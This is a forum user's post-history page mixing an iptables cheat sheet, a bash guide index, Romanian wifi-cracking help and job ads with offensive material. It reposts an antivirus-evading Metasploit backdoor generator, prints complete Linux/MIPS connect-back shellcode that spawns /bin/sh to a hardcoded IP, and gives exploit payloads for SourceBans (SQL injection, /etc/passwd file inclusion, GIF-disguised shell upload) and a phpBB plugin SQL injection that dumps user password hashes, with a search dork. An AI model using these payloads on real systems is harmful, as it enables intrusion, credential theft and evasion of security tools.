Jump to content

co4ie

Active Members
 View Profile  See their activity

  • Posts

    638

  • Joined

  • Last visited

  • Days Won

    6

 Content Type 

Everything posted by co4ie

  1. co4ie
    Fully Undetectable Backdoor generator for Metasploit Security Labs Experts from Indian launch an automated Anti-Virus and Firewall Bypass Script. Its an Modified and Stable Version in order to work with Backtrack 5 distro. Below you can find the modified version and a simple presentation on how it works: In order to be able to compile the generated payload we must install the following packages ; Mingw32 gcc which you can install by : root@bt:~# apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils After the installation we must move our shell-script - Vanish.sh - to default Metasploit folder (/pentest/exploits/framework) and execute it. Recommended Seed Number = 7000 and Number of Encode = 14 . Note: By default Script Generates Reverse TCP Payload but you can change it some modifications in Script [vanish.sh]. Virus Scan Report of Backdoor shows that its almost undetectable by most of the Antivirus programs. Download Link : Click Here [Vanish.sh] Size : 3.3 KB OR Pastebin Version here Sursa
  2. co4ie
    Linux comes with a host based firewall called Netfilter. According to the official project site: This Linux based firewall is controlled by the program called iptables to handles filtering for IPv4, and ip6tables handles filtering for IPv6. I strongly recommend that you first read our quick tutorial that explains how to configure a host-based firewall called Netfilter (iptables) under CentOS / RHEL / Fedora / Redhat Enterprise Linux. This post list most common iptables solutions required by a new Linux user to secure his or her Linux operating system from intruders. IPTABLES Rules Example Most of the actions listed in this post are written with the assumption that they will be executed by the root user running the bash or any other modern shell. Do not type commands on remote system as it will disconnect your access. For demonstration purpose I've used RHEL 6.x, but the following command should work with any modern Linux distro. This is NOT a tutorial on how to set iptables. See tutorial here. It is a quick cheat sheet to common iptables commands. #1: Displaying the Status of Your Firewall Type the following command as root: # iptables -L -n -v Sample outputs: Chain INPUT (policy ACCEPT 0 packets, 0 bytes) pkts bytes target prot opt in out source destination Chain FORWARD (policy ACCEPT 0 packets, 0 bytes) pkts bytes target prot opt in out source destination Chain OUTPUT (policy ACCEPT 0 packets, 0 bytes) pkts bytes target prot opt in out source destination Above output indicates that the firewall is not active. The following sample shows an active firewall: # iptables -L -n -v Sample outputs: Chain INPUT (policy DROP 0 packets, 0 bytes) pkts bytes target prot opt in out source destination 0 0 DROP all -- * * 0.0.0.0/0 0.0.0.0/0 state INVALID 394 43586 ACCEPT all -- * * 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED 93 17292 ACCEPT all -- br0 * 0.0.0.0/0 0.0.0.0/0 1 142 ACCEPT all -- lo * 0.0.0.0/0 0.0.0.0/0 Chain FORWARD (policy DROP 0 packets, 0 bytes) pkts bytes target prot opt in out source destination 0 0 ACCEPT all -- br0 br0 0.0.0.0/0 0.0.0.0/0 0 0 DROP all -- * * 0.0.0.0/0 0.0.0.0/0 state INVALID 0 0 TCPMSS tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcp flags:0x06/0x02 TCPMSS clamp to PMTU 0 0 ACCEPT all -- * * 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED 0 0 wanin all -- vlan2 * 0.0.0.0/0 0.0.0.0/0 0 0 wanout all -- * vlan2 0.0.0.0/0 0.0.0.0/0 0 0 ACCEPT all -- br0 * 0.0.0.0/0 0.0.0.0/0 Chain OUTPUT (policy ACCEPT 425 packets, 113K bytes) pkts bytes target prot opt in out source destination Chain wanin (1 references) pkts bytes target prot opt in out source destination Chain wanout (1 references) pkts bytes target prot opt in out source destination Where, -L : List rules. -v : Display detailed information. This option makes the list command show the interface name, the rule options, and the TOS masks. The packet and byte counters are also listed, with the suffix 'K', 'M' or 'G' for 1000, 1,000,000 and 1,000,000,000 multipliers respectively. -n : Display IP address and port in numeric format. Do not use DNS to resolve names. This will speed up listing. #1.1: To inspect firewall with line numbers, enter: # iptables -n -L -v --line-numbers Sample outputs: Chain INPUT (policy DROP) num target prot opt source destination 1 DROP all -- 0.0.0.0/0 0.0.0.0/0 state INVALID 2 ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED 3 ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 4 ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 Chain FORWARD (policy DROP) num target prot opt source destination 1 ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 2 DROP all -- 0.0.0.0/0 0.0.0.0/0 state INVALID 3 TCPMSS tcp -- 0.0.0.0/0 0.0.0.0/0 tcp flags:0x06/0x02 TCPMSS clamp to PMTU 4 ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED 5 wanin all -- 0.0.0.0/0 0.0.0.0/0 6 wanout all -- 0.0.0.0/0 0.0.0.0/0 7 ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 Chain OUTPUT (policy ACCEPT) num target prot opt source destination Chain wanin (1 references) num target prot opt source destination Chain wanout (1 references) num target prot opt source destination You can use line numbers to delete or insert new rules into the firewall. #1.2: To display INPUT or OUTPUT chain rules, enter: # iptables -L INPUT -n -v # iptables -L OUTPUT -n -v --line-numbers #2: Stop / Start / Restart the Firewall If you are using CentOS / RHEL / Fedora Linux, enter: # service iptables stop # service iptables start # service iptables restart You can use the iptables command itself to stop the firewall and delete all rules: # iptables -F # iptables -X # iptables -t nat -F # iptables -t nat -X # iptables -t mangle -F # iptables -t mangle -X # iptables -P INPUT ACCEPT # iptables -P OUTPUT ACCEPT # iptables -P FORWARD ACCEPT Where, -F : Deleting (flushing) all the rules. -X : Delete chain. -t table_name : Select table (called nat or mangle) and delete/flush rules. -P : Set the default policy (such as DROP, REJECT, or ACCEPT). #3: Delete Firewall Rules To display line number along with other information for existing rules, enter: # iptables -L INPUT -n --line-numbers # iptables -L OUTPUT -n --line-numbers # iptables -L OUTPUT -n --line-numbers | less # iptables -L OUTPUT -n --line-numbers | grep 202.54.1.1 You will get the list of IP. Look at the number on the left, then use number to delete it. For example delete line number 4, enter: # iptables -D INPUT 4 OR find source IP 202.54.1.1 and delete from rule: # iptables -D INPUT -s 202.54.1.1 -j DROP Where, -D : Delete one or more rules from the selected chain #4: Insert Firewall Rules To insert one or more rules in the selected chain as the given rule number use the following syntax. First find out line numbers, enter: # iptables -L INPUT -n --line-numbers Sample outputs: Chain INPUT (policy DROP) num target prot opt source destination 1 DROP all -- 202.54.1.1 0.0.0.0/0 2 ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 state NEW,ESTABLISHED To insert rule between 1 and 2, enter: # iptables -I INPUT 2 -s 202.54.1.2 -j DROP To view updated rules, enter: # iptables -L INPUT -n --line-numbers Sample outputs: Chain INPUT (policy DROP) num target prot opt source destination 1 DROP all -- 202.54.1.1 0.0.0.0/0 2 DROP all -- 202.54.1.2 0.0.0.0/0 3 ACCEPT all -- 0.0.0.0/0 0.0.0.0/0 state NEW,ESTABLISHED #5: Save Firewall Rules To save firewall rules under CentOS / RHEL / Fedora Linux, enter: # service iptables save In this example, drop an IP and save firewall rules: # iptables -A INPUT -s 202.5.4.1 -j DROP # service iptables save For all other distros use the iptables-save command: # iptables-save > /root/my.active.firewall.rules # cat /root/my.active.firewall.rules #6: Restore Firewall Rules To restore firewall rules form a file called /root/my.active.firewall.rules, enter: # iptables-restore < /root/my.active.firewall.rules To restore firewall rules under CentOS / RHEL / Fedora Linux, enter: # service iptables restart #7: Set the Default Firewall Policies To drop all traffic: # iptables -P INPUT DROP # iptables -P OUTPUT DROP # iptables -P FORWARD DROP # iptables -L -v -n #### you will not able to connect anywhere as all traffic is dropped ### # ping cyberciti.biz # wget http://www.kernel.org/pub/linux/kernel/v3.0/testing/linux-3.2-rc5.tar.bz2 #7.1: Only Block Incoming Traffic To drop all incoming / forwarded packets, but allow outgoing traffic, enter: # iptables -P INPUT DROP # iptables -P FORWARD DROP # iptables -P OUTPUT ACCEPT # iptables -A INPUT -m state --state NEW,ESTABLISHED -j ACCEPT # iptables -L -v -n ### *** now ping and wget should work *** ### # ping cyberciti.biz # wget http://www.kernel.org/pub/linux/kernel/v3.0/testing/linux-3.2-rc5.tar.bz2 #8: Drop Private Network Address On Public Interface IP spoofing is nothing but to stop the following IPv4 address ranges for private networks on your public interfaces. Packets with non-routable source addresses should be rejected using the following syntax: # iptables -A INPUT -i eth1 -s 192.168.0.0/24 -j DROP # iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP #8.1: IPv4 Address Ranges For Private Networks (make sure you block them on public interface) 10.0.0.0/8 -j (A) 172.16.0.0/12 ( 192.168.0.0/16 (C) 224.0.0.0/4 (MULTICAST D) 240.0.0.0/5 (E) 127.0.0.0/8 (LOOPBACK) #9: Blocking an IP Address (BLOCK IP) To block an attackers ip address called 1.2.3.4, enter: # iptables -A INPUT -s 1.2.3.4 -j DROP # iptables -A INPUT -s 192.168.0.0/24 -j DROP #10: Block Incoming Port Requests (BLOCK PORT) To block all service requests on port 80, enter: # iptables -A INPUT -p tcp --dport 80 -j DROP # iptables -A INPUT -i eth1 -p tcp --dport 80 -j DROP To block port 80 only for an ip address 1.2.3.4, enter: # iptables -A INPUT -p tcp -s 1.2.3.4 --dport 80 -j DROP # iptables -A INPUT -i eth1 -p tcp -s 192.168.1.0/24 --dport 80 -j DROP #11: Block Outgoing IP Address To block outgoing traffic to a particular host or domain such as cyberciti.biz, enter: # host -t a cyberciti.biz Sample outputs: cyberciti.biz has address 75.126.153.206 Note down its ip address and type the following to block all outgoing traffic to 75.126.153.206: # iptables -A OUTPUT -d 75.126.153.206 -j DROP You can use a subnet as follows: # iptables -A OUTPUT -d 192.168.1.0/24 -j DROP # iptables -A OUTPUT -o eth1 -d 192.168.1.0/24 -j DROP #11.1: Example - Block Facebook.com Domain First, find out all ip address of facebook.com, enter: # host -t a www.facebook.com Sample outputs: www.facebook.com has address 69.171.228.40 Find CIDR for 69.171.228.40, enter: # whois 69.171.228.40 | grep CIDR Sample outputs: CIDR: 69.171.224.0/19 To prevent outgoing access to Bine ai venit pe Facebook - autentific?-te, înscrie-te sau afl? mai multe, enter: # iptables -A OUTPUT -p tcp -d 69.171.224.0/19 -j DROP You can also use domain name, enter: # iptables -A OUTPUT -p tcp -d www.facebook.com -j DROP # iptables -A OUTPUT -p tcp -d facebook.com -j DROP From the iptables man page: #12: Log and Drop Packets Type the following to log and block IP spoofing on public interface called eth1 # iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j LOG --log-prefix "IP_SPOOF A: " # iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP By default everything is logged to /var/log/messages file. # tail -f /var/log/messages # grep --color 'IP SPOOF' /var/log/messages #13: Log and Drop Packets with Limited Number of Log Entries The -m limit module can limit the number of log entries created per time. This is used to prevent flooding your log file. To log and drop spoofing per 5 minutes, in bursts of at most 7 entries . # iptables -A INPUT -i eth1 -s 10.0.0.0/8 -m limit --limit 5/m --limit-burst 7 -j LOG --log-prefix "IP_SPOOF A: " # iptables -A INPUT -i eth1 -s 10.0.0.0/8 -j DROP #14: Drop or Accept Traffic From Mac Address Use the following syntax: # iptables -A INPUT -m mac --mac-source 00:0F:EA:91:04:08 -j DROP ## *only accept traffic for TCP port # 8080 from mac 00:0F:EA:91:04:07 * ## # iptables -A INPUT -p tcp --destination-port 22 -m mac --mac-source 00:0F:EA:91:04:07 -j ACCEPT #15: Block or Allow ICMP Ping Request Type the following command to block ICMP ping requests: # iptables -A INPUT -p icmp --icmp-type echo-request -j DROP # iptables -A INPUT -i eth1 -p icmp --icmp-type echo-request -j DROP Ping responses can also be limited to certain networks or hosts: # iptables -A INPUT -s 192.168.1.0/24 -p icmp --icmp-type echo-request -j ACCEPT The following only accepts limited type of ICMP requests: ### ** assumed that default INPUT policy set to DROP ** ############# iptables -A INPUT -p icmp --icmp-type echo-reply -j ACCEPT iptables -A INPUT -p icmp --icmp-type destination-unreachable -j ACCEPT iptables -A INPUT -p icmp --icmp-type time-exceeded -j ACCEPT ## ** all our server to respond to pings ** ## iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT #16: Open Range of Ports Use the following syntax to open a range of ports: iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 7000:7010 -j ACCEPT #17: Open Range of IP Addresses Use the following syntax to open a range of IP address: ## only accept connection to tcp port 80 (Apache) if ip is between 192.168.1.100 and 192.168.1.200 ## iptables -A INPUT -p tcp --destination-port 80 -m iprange --src-range 192.168.1.100-192.168.1.200 -j ACCEPT ## nat example ## iptables -t nat -A POSTROUTING -j SNAT --to-source 192.168.1.20-192.168.1.25 #17: Established Connections and Restaring The Firewall When you restart the iptables service it will drop established connections as it unload modules from the system under RHEL / Fedora / CentOS Linux. Edit, /etc/sysconfig/iptables-config and set IPTABLES_MODULES_UNLOAD as follows: IPTABLES_MODULES_UNLOAD = no #18: Help Iptables Flooding My Server Screen Use the crit log level to send messages to a log file instead of console: iptables -A INPUT -s 1.2.3.4 -p tcp --destination-port 80 -j LOG --log-level crit #19: Block or Open Common Ports The following shows syntax for opening and closing common TCP and UDP ports: Replace ACCEPT with DROP to block port: ## open port ssh tcp port 22 ## iptables -A INPUT -m state --state NEW -m tcp -p tcp --dport 22 -j ACCEPT iptables -A INPUT -s 192.168.1.0/24 -m state --state NEW -p tcp --dport 22 -j ACCEPT ## open cups (printing service) udp/tcp port 631 for LAN users ## iptables -A INPUT -s 192.168.1.0/24 -p udp -m udp --dport 631 -j ACCEPT iptables -A INPUT -s 192.168.1.0/24 -p tcp -m tcp --dport 631 -j ACCEPT ## allow time sync via NTP for lan users (open udp port 123) ## iptables -A INPUT -s 192.168.1.0/24 -m state --state NEW -p udp --dport 123 -j ACCEPT ## open tcp port 25 (smtp) for all ## iptables -A INPUT -m state --state NEW -p tcp --dport 25 -j ACCEPT # open dns server ports for all ## iptables -A INPUT -m state --state NEW -p udp --dport 53 -j ACCEPT iptables -A INPUT -m state --state NEW -p tcp --dport 53 -j ACCEPT ## open http/https (Apache) server port to all ## iptables -A INPUT -m state --state NEW -p tcp --dport 80 -j ACCEPT iptables -A INPUT -m state --state NEW -p tcp --dport 443 -j ACCEPT ## open tcp port 110 (pop3) for all ## iptables -A INPUT -m state --state NEW -p tcp --dport 110 -j ACCEPT ## open tcp port 143 (imap) for all ## iptables -A INPUT -m state --state NEW -p tcp --dport 143 -j ACCEPT ## open access to Samba file server for lan users only ## iptables -A INPUT -s 192.168.1.0/24 -m state --state NEW -p tcp --dport 137 -j ACCEPT iptables -A INPUT -s 192.168.1.0/24 -m state --state NEW -p tcp --dport 138 -j ACCEPT iptables -A INPUT -s 192.168.1.0/24 -m state --state NEW -p tcp --dport 139 -j ACCEPT iptables -A INPUT -s 192.168.1.0/24 -m state --state NEW -p tcp --dport 445 -j ACCEPT ## open access to proxy server for lan users only ## iptables -A INPUT -s 192.168.1.0/24 -m state --state NEW -p tcp --dport 3128 -j ACCEPT ## open access to mysql server for lan users only ## iptables -I INPUT -p tcp --dport 3306 -j ACCEPT #20: Restrict the Number of Parallel Connections To a Server Per Client IP You can use connlimit module to put such restrictions. To allow 3 ssh connections per client host, enter: # iptables -A INPUT -p tcp --syn --dport 22 -m connlimit --connlimit-above 3 -j REJECT Set HTTP requests to 20: # iptables -p tcp --syn --dport 80 -m connlimit --connlimit-above 20 --connlimit-mask 24 -j DROP Where, --connlimit-above 3 : Match if the number of existing connections is above 3. --connlimit-mask 24 : Group hosts using the prefix length. For IPv4, this must be a number between (including) 0 and 32. #21: HowTO: Use iptables Like a Pro For more information about iptables, please see the manual page by typing man iptables from the command line: $ man iptables You can see the help using the following syntax too: # iptables -h To see help with specific commands and targets, enter: # iptables -j DROP -h #21.1: Testing Your Firewall Find out if ports are open or not, enter: # netstat -tulpn Find out if tcp port 80 open or not, enter: # netstat -tulpn | grep :80 If port 80 is not open, start the Apache, enter: # service httpd start Make sure iptables allowing access to the port 80: # iptables -L INPUT -v -n | grep 80 Otherwise open port 80 using the iptables for all users: # iptables -A INPUT -m state --state NEW -p tcp --dport 80 -j ACCEPT # service iptables save Use the telnet command to see if firewall allows to connect to port 80: $ telnet www.cyberciti.biz 80 Sample outputs: Trying 75.126.153.206... Connected to www.cyberciti.biz. Escape character is '^]'. ^] telnet> quit Connection closed. You can use nmap to probe your own server using the following syntax: $ nmap -sS -p 80 www.cyberciti.biz Sample outputs: Starting Nmap 5.00 ( http://nmap.org ) at 2011-12-13 13:19 IST Interesting ports on www.cyberciti.biz (75.126.153.206): PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 1.00 seconds I also recommend you install and use sniffer such as tcpdupm and ngrep to test your firewall settings. Conclusion: This post only list basic rules for new Linux users. You can create and build more complex rules. This requires good understanding of TCP/IP, Linux kernel tuning via sysctl.conf, and good knowledge of your own setup. Stay tuned for next topics: Stateful packet inspection. Using connection tracking helpers. Network address translation. Layer 2 filtering. Firewall testing tools. Dealing with VPNs, DNS, Web, Proxy, and other protocols. Sursa
      • 1
      • Upvote
  3. co4ie
    Advanced Bash-Scripting Guide An in-depth exploration of the art of shell scripting By Mendel Cooper Table of Contents Part 1. Introduction 1. Shell Programming! 2. Starting Off With a Sha-Bang Part 2. Basics 3. Special Characters 4. Introduction to Variables and Parameters 5. Quoting 6. Exit and Exit Status 7. Tests 8. Operations and Related Topics Part 3. Beyond the Basics 9. Another Look at Variables 10. Manipulating Variables 11. Loops and Branches 12. Command Substitution 13. Arithmetic Expansion 14. Recess Time Part 4. Commands 15. Internal Commands and Builtins 16. External Filters, Programs and Commands 17. System and Administrative Commands Part 5. Advanced Topics 18. Regular Expressions 19. Here Documents 20. I/O Redirection 21. Subshells 22. Restricted Shells 23. Process Substitution 24. Functions 25. Aliases 26. List Constructs 27. Arrays 28. Indirect References 29. /dev and /proc 30. Network Programming 31. Of Zeros and Nulls 32. Debugging 33. Options 34. Gotchas 35. Scripting With Style 36. Miscellany 37. Bash, versions 2, 3, and 4 38. Endnotes 38.1. Author's Note 38.2. About the Author 38.3. Where to Go For Help 38.4. Tools Used to Produce This Book 38.5. Credits 38.6. Disclaimer Bibliography A. Contributed Scripts B. Reference Cards C. A Sed and Awk Micro-Primer C.1. Sed C.2. Awk D. Exit Codes With Special Meanings E. A Detailed Introduction to I/O and I/O Redirection F. Command-Line Options F.1. Standard Command-Line Options F.2. Bash Command-Line Options G. Important Files H. Important System Directories I. An Introduction to Programmable Completion J. Localization K. History Commands L. Sample .bashrc and .bash_profile Files M. Converting DOS Batch Files to Shell Scripts N. Exercises N.1. Analyzing Scripts N.2. Writing Scripts O. Revision History P. Download and Mirror Sites Q. To Do List R. Copyright S. ASCII Table Index Download as : PDF HTML Sursa
  4. co4ie
    Cel mai probabil este un senzor care iti face probleme... in momentul in care incepe sa se incalzeasca ,coolerul se invarte mai tare sau la aceeasi viteza ca la inceput?
  5. co4ie
    ok... acum poti incerca asta: apt-get install build-essential apt-get install libssl-dev si dupa ifconfig wlan0 down wget http://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2 tar -xjf ipwraw-ng* cd ipwraw-ng make make install make install_ucode echo "blacklist ipwraw" | sudo tee /etc/modprobe.d/ipwraw Driver-ul asta suporta monitor mode si injectie dar nu stiu exact daca suporta si Master ... mai incerci o data sa pui in Master mode ... in speranta ca o sa mearga (desi cam peste tot pe unde am citit nu suporta master mode...) : ifconfig wlan0 up iwconfig wlan0 mode Master -->> SAU "Master" iwconfig wlan0 channel 6 iwconfig wlan0 essid Retea -->> SAU "Retea" iwconfig wlan0 key 11111111 (64 bit encryption) -->> SAU iwconfig wlan0 key open (fara pass) Daca merge Master Mode faci un bridge intre eth0 si wlan0 brctl addbr br0 ifconfig wlan0 0.0.0.0 brctl addif br0 wlan0 ifconfig br0 192.168.1.115 netmask 255.255.255.0 up route add -net 192.168.1.0 netmask 255.255.255.0 br0 route add default gw 192.168.1.1 br0
  6. co4ie
    ok... da comanda uname -a si scrie aici ce iti da ... poti incerca sa faci update la tot apt-get dist-upgrade si sa mai incerci o data ! daca nici asta nu merge lspci | grep Wireless si paste aici poate gasim un driver care sa functioneze si in master mode...
  7. co4ie
    Daca ai placa wifi primul pas ar fi sa vezi daca este compatibila cu suita aircrack ... cauta aici modelul pe care il ai ! Si ca sa fie simplu ... intra Aici fa un cd ... booteaza pe el ... si dupa uitate Aici ... mai simplu de atat nu iti pot explica...
  8. co4ie
    BTW ... 1: WEP = Wired Equivalent Privacy ... 2: "equivalency" se refera la Valente egale ... in chimie deci nu are nici o treaba !! 3: Daca (si spun asta prin absurd) ai o placa WIFI care sa suporte monitor mode si injectie (in windows) poti folosi mult mai simplu alte tool-uri ... de exemplu Aircrack 4 Windows (asta ca sa nu te complici cu 3 programe...) 4: Chiar daca apreciez efortul ... mi se pare complet inutil si prea complicat tutorial-ul pentru ca se poate face mult mult mult mai simplu doar cu aircrack si in windows si in linux (de exemplu backtrack, care are deja instalat tot)
  9. co4ie
    Pai ca sa fii sigur de handshake il deconectezi tu pe ala... e cea mai simpla metoda... Merci pentru video!!
  10. co4ie
    Odin nu il vede daca nu e in download mode... Nu prea ai ce face decat sa il bagi in service...daca te intreaba zici ca deodata nu a mai vrut sa se deschida si atat !!
  11. co4ie
    Merci mult !!
  12. co4ie
    Download Link
      • 1
      • Upvote
  13. co4ie
    /* * Title: Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes. * Author: rigan - imrigan [sobachka] gmail.com */ #include <stdio.h> char sc[] = "\x24\x0f\xff\xfd" // li t7,-3 "\x01\xe0\x20\x27" // nor a0,t7,zero "\x01\xe0\x28\x27" // nor a1,t7,zero "\x28\x06\xff\xff" // slti a2,zero,-1 "\x24\x02\x10\x57" // li v0,4183 ( sys_socket ) "\x01\x01\x01\x0c" // syscall 0x40404 "\xaf\xa2\xff\xff" // sw v0,-1(sp) "\x8f\xa4\xff\xff" // lw a0,-1(sp) "\x24\x0f\xff\xfd" // li t7,-3 ( sa_family = AF_INET ) "\x01\xe0\x78\x27" // nor t7,t7,zero "\xaf\xaf\xff\xe0" // sw t7,-32(sp) "\x3c\x0e\x7a\x69" // lui t6,0x7a69 ( sin_port = 0x7a69 ) "\x35\xce\x7a\x69" // ori t6,t6,0x7a69 "\xaf\xae\xff\xe4" // sw t6,-28(sp) /* ==================== You can change ip here ====================== */ "\x3c\x0d\xc0\xa8" // lui t5,0xc0a8 ( sin_addr = 0xc0a8 ... "\x35\xad\x01\x64" // ori t5,t5,0x164 ...0164 ) /* ====================================================================== */ "\xaf\xad\xff\xe6" // sw t5,-26(sp) "\x23\xa5\xff\xe2" // addi a1,sp,-30 "\x24\x0c\xff\xef" // li t4,-17 ( addrlen = 16 ) "\x01\x80\x30\x27" // nor a2,t4,zero "\x24\x02\x10\x4a" // li v0,4170 ( sys_connect ) "\x01\x01\x01\x0c" // syscall 0x40404 "\x24\x0f\xff\xfd" // li t7,-3 "\x01\xe0\x28\x27" // nor a1,t7,zero "\x8f\xa4\xff\xff" // lw a0,-1(sp) //dup2_loop: "\x24\x02\x0f\xdf" // li v0,4063 ( sys_dup2 ) "\x01\x01\x01\x0c" // syscall 0x40404 "\x20\xa5\xff\xff" // addi a1,a1,-1 "\x24\x01\xff\xff" // li at,-1 "\x14\xa1\xff\xfb" // bne a1,at, dup2_loop "\x28\x06\xff\xff" // slti a2,zero,-1 "\x3c\x0f\x2f\x2f" // lui t7,0x2f2f "\x35\xef\x62\x69" // ori t7,t7,0x6269 "\xaf\xaf\xff\xf4" // sw t7,-12(sp) "\x3c\x0e\x6e\x2f" // lui t6,0x6e2f "\x35\xce\x73\x68" // ori t6,t6,0x7368 "\xaf\xae\xff\xf8" // sw t6,-8(sp) "\xaf\xa0\xff\xfc" // sw zero,-4(sp) "\x27\xa4\xff\xf4" // addiu a0,sp,-12 "\x28\x05\xff\xff" // slti a1,zero,-1 "\x24\x02\x0f\xab" // li v0,4011 ( sys_execve ) "\x01\x01\x01\x0c"; // syscall 0x40404 void main(void) { void(*s)(void); printf("size: %d\n", sizeof(sc)); s = sc; s(); } Sursa
  14. co4ie
    Title: Security Project Manager Category: Planning Job type: Permanent Job status: Full Time Salary: £92,400.00 - £95,040.00 Salary per: annum Location: England, South East, Hampshire, GOSPORT ------------------------------- Security Project Manager Gosport £350 - £360 a day Must be SC Cleared Job title: Trainee IT Security Consultant (Entry Level Opportunity) Position type: Full-time Job location: Cambridgeshire CB1 Compensation: £30000 - 30000 Annually, Up to 30,000 DOE Company name: Web-recruit Job category: Information Technology and Services Junior Penetration Tester - Ethical Hacking / Digital Forensics Location:Kidderminster Salary: £20000 - £25000 per annum Job type: Permanent Company: Hewett Recruitment Contact: Ben Mannion Ref: Totaljobs/BMLH/JPAT Job ID: 51534275 Quick Facts About Ethical Hacking Work @ cosminel check THIS
  15. co4ie
    si baga si un buton de "Wrap tags" in quick reply pls:D ...
  16. co4ie
    ok... dragut tutorial ... script-ul este facut in bash ? sau in ce? ... daca tot zici ca e tutorial la ceva pune si script-ul folosit , ca sa aiba lumea cu ce se distra ! BTW ... vezi ca ai insert video
  17. co4ie
    @Pugna cand am zi ca ma refeream ca este capabila daca este si compatibila !!! Zi si tu modelul la placa ... sau chipset-ul ca sa iti zic ce driver suporta injectie / daca suporta injectie ... lspci | grep Wireless -->> daca nu iti apare nimic asa da doar "lspci" si selecteaza placa wifi ifconfig wlan0 -->> sau cum se numeste adaptorul tau (presupun ca wlan0 sau ath0) si da un reply cu ce iti da !! @gallardo: 1. daca folosesti linux fa si tu ce am scris mai sus si da un reply cu rezultatul sa vedem ce driver se potriveste si daca suporta injectie... 2. tu cu , comanda de mai sus ce vroiai sa faci ? ce cod sa bagi si unde? daca incercai pe WPA e simplu ... dar trebuie sa ai un client deja conectat !! nu stiu ce tutorial urmareai tu dar se pare ca te-ai complicat rau si degeaba cu frame selection... si orice ati face ... daca aveti un AP sau placa wifi si vreti sa vedeti daca suporta injectie aireplay-ng -9 -e "ESSID" -a "BSSID" mon0 unde: -9 este testul de injectie "ESSID" numele AP-ului "BSSID" MAC-ul AP-ului LE: Ce ma seaca ca in modul normal de a posta (nu advanced) nu este butonul de "code wrap"
  18. co4ie
    # Exploit Title: SourceBans <= 1.4.8 SQL/LFI Injection # Date: Dec. 6th 2011 # Author: Havok # Software Link: SourceBans # Version: <= 1.4.8 "- What is SourceBans? SourceBans is a free global administration and banning system for Source engine based servers." Vulnerabilities: 1°) SQL Injection: Proof of concept: http://1m-4-1337-m8.c0m/index.php?xajax=RefreshServer&xajaxargs[]=1' <=== SQL Error w00t! 2°) LFI Injection: Only works when you're authentified as root administrator or as somebody who is able to change the SourceBans theme : Proof of concept: http://server/index.php?xajax=SelTheme&xajaxargs[]=../../../../../../../../../../etc/passwd%00 Note: There is also a possibility to get a shell by adding "GIF89a" at the very beginning of the shell, renaming it to h4x0rz.gif and uploading it as an icon in the admin panel. Then include the file with the LFI and G4M3 0V3R . => In memory of crashfr who will NEVER die. Merci pour tout mec! ;-))... R.I.P. ./EOF
  19. co4ie
    ==================================================== MyPage plugin (phpBB) SQL Injection (All versions) ==================================================== ==================================================== Improve your hacking knowledges ! ==================================================== # Exploit Title: SQL Injection on the plugin phpBB plugin MyPage # Google Dork: inurl:"mypage.php?id=" # Date: 06/12/2011 # Author: CrazyMouse (from HackSociety.net) # Version: 0.2.3 (this is the last avaliable version, older versions are also vulnerable) # Tested on: Windows 7 x64 (Firefox) ==================================================== [~] Exploit: http://localhost/forum/ [~] http://localhost/forum/mypage.php?id= (SQL) [~] Example: http://server/forum/mypage.php?id=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Cphpbb_users.user_id%2C0x5e%2Cphpbb_users.user_type%2C0x5e%2Cphpbb_users.group_id%2C0x5e%2Cphpbb_users.username%2C0x5e%2Cphpbb_users.user_password%2C0x27%2C0x7e%29+from+%60forum_domperm%60.phpbb_users+limit+5%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271 ==================================================== # Thanks to Crassus ==================================================== Sursa
  20. co4ie
    It has been a while since my last article. Special thanks to those who decided to stay with me despite the long break and welcome to new readers! In this article I am going to cover such a trivial (as it may seem) subject as DLL injection. For some reason, most of the tutorials on the web only give us a brief coverage of the topic, mostly limited to invocation of LoadLibraryA/W Windows API function in the address space of another process. While this is not bad at all, it gives us the least flexible solution. Meaning that all the logic MUST be hardcoded in the DLL we want to inject. On the other hand, we may incorporate all the configuration management (loading config files, parsing thereof, etc) into our DLL. This is better, but still fills it with code which is only going to run once. Let us try another approach. What we are going to do, is write a loader (an executable what will inject our DLL into another process) and a small DLL, which will be injected. For simplicity, the loader will also create the target process. Being a Linux user, I used Flat Assembler and mingw32 for this task, but you may adjust the code for whatever environment you prefer. A short remark for nerds before we start. The code in this article does not contain any security checks (e.g. checking correctness of the value returned by specific function) unless it is needed as an example. If you decide to try this code, you'll be doing this at your own risk. So, let the fun begin. Creation of target process Let's assume, that the loader has already passed the phase of loading and parsing configuration files and is ready to start the actual job. Windows provides us with all the tools we need to start a process. There are more then one way of doing that, but let us use the simplest and use CreateProcess API function. Its declaration looks quite frightening, but we'll make it as easy as possible: BOOL WINAPI CreateProcess( __in_opt LPCTSTR lpApplicationName, __inout_opt LPTSTR lpCommandLine, __in_opt LPSECURITY_ATTRIBUTES lpProcessAttributes, __in_opt LPSECURITY_ATTRIBUTES lpThreadAttributes, __in BOOL bInheritHandles, __in DWORD dwCreationFlags, __in_opt LPVOID lpEnvironment, __in_opt LPCTSTR lpCurrentDirectory, __in LPSTARTUPINFO lpStartupInfo, __out LPPROCESS_INFORMATION lpProcessInformation ); We only have to specify half of the parameters when calling this function and set all the rest to NULL. This function has two variants CreateProcessA and CreateProcessW as ASCII and Unicode versions respectively. We are going to stick with ASCII all way long, so, our code would look like 